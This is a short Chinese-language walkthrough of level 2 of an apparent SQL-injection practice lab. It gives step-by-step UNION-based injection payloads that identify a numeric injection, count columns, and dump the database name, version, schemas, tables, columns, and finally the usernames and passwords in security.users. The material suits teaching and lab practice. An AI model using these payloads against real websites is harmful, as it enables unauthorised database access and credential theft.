打开第二关
1,传入id=1 查看页面回显
2,判断注入类型,字符型,数值型
/?id=1 and 1=1 回显正常,判断为数字型
/?id=1 and 1=2回显错误
3,判断字段数有几列数据
/?id=1 and 1=2 union select 1,2,3 -- limit 0,1
limit后面的第一个参数表示从第几+1行开始查,第二个参数表示查几条数据
eg:3,2 第四行,取两行
返回2,3两个显示位
4,查数据库名和版本号
/?id=1 and 1=2 union select 1,database(),version() --+
5,爆破出数据库内的数据库名
/?id=1 and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata -- limit 0,1
6,爆破出security数据库内的表名
/?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
7,如果上一步没有爆出数据库名,也可以
/?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
8,使用limit函数逐一查询
/?id=1 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 --+
9,利用sql爆破出user数据表内的列名
/?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
10,也可用limit逐一查询
/?id=1 and 1=2 union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='users' limit 0,1 --+
11,利用sql爆出username,password列的值
/?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from security.users --+